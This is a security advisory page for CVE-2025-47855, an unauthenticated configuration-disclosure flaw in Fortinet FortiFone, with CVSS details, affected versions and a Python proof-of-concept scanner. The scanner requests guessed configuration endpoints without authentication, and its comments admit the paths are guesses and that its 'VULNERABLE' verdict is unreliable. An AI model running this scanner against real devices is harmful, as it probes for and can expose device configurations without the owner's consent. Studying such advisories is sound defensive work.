Security Vulnerability Report

CVE-2025-47855

Published: 2026-01-13 17:15:58
Last Modified: 2026-04-15 00:35:42

Description

An exposure of sensitive information to an unauthorized actor [CWE-200] vulnerability in Fortinet FortiFone 7.0.0 through 7.0.1, FortiFone 3.0.13 through 3.0.23 allows an unauthenticated attacker to obtain the device configuration via crafted HTTP or HTTPS requests.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
(Attack vector: Network; Attack complexity: Low; Privileges required: None; User interaction: None; Scope: Unchanged; Confidentiality/Integrity/Availability impact: High)

Configurations (Affected Products)

No configuration data available. The affected versions below are those named in the description:

FortiFone 7.0.0
FortiFone 7.0.1
FortiFone 3.0.13
FortiFone 3.0.14
FortiFone 3.0.15
FortiFone 3.0.16
FortiFone 3.0.17
FortiFone 3.0.18
FortiFone 3.0.19
FortiFone 3.0.20
FortiFone 3.0.21
FortiFone 3.0.22
FortiFone 3.0.23

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-47855 PoC - FortiFone Information Disclosure
# Target: Fortinet FortiFone devices
# Affected: 7.0.0-7.0.1, 3.0.13-3.0.23


def exploit_fortifone(target_url):
    """
    Exploit for CVE-2025-47855: Unauthenticated configuration disclosure
    """
    # Common configuration endpoints that may expose sensitive data.
    # Note: these paths are the PoC author's generic guesses; the advisory
    # text on this page does not specify which request triggers the issue.
    endpoints = [
        '/api/v1/config',
        '/api/config',
        '/cgi/config.cgi',
        '/fcgi/config.fcgi',
        '/api/v1/system/config',
        '/api/v2/config/system',
        '/config/system',
        '/api/system/info'
    ]

    print(f"[*] Scanning target: {target_url}")
    print("[*] CVE-2025-47855 PoC - FortiFone Information Disclosure\n")

    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        try:
            # Send unauthenticated request (TLS verification disabled;
            # requests will emit an InsecureRequestWarning for HTTPS targets)
            response = requests.get(url, timeout=10, verify=False)

            # A 200 response alone does not prove disclosure: any page that
            # answers 200 (e.g. a login form) is flagged here, so inspect the
            # sample data before treating the result as confirmed.
            if response.status_code == 200:
                print(f"[+] VULNERABLE: {endpoint}")
                print(f"[+] Status: {response.status_code}")
                print(f"[+] Content-Length: {len(response.content)}")
                print(f"[+] Sample data: {response.text[:500]}...")
                print("-" * 60)
            elif response.status_code == 401:
                print(f"[-] Protected: {endpoint} (401 Unauthorized)")
            else:
                print(f"[*] Endpoint: {endpoint} (Status: {response.status_code})")
        except requests.exceptions.RequestException as e:
            print(f"[!] Error accessing {endpoint}: {e}")

    print("\n[*] Scan complete. If vulnerable, configuration data was exposed.")


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} https://192.168.1.100")
        sys.exit(1)
    target = sys.argv[1]
    exploit_fortifone(target)

References

Fortinet PSIRT advisory FG-IR-25-260: https://fortiguard.fortinet.com/psirt/FG-IR-25-260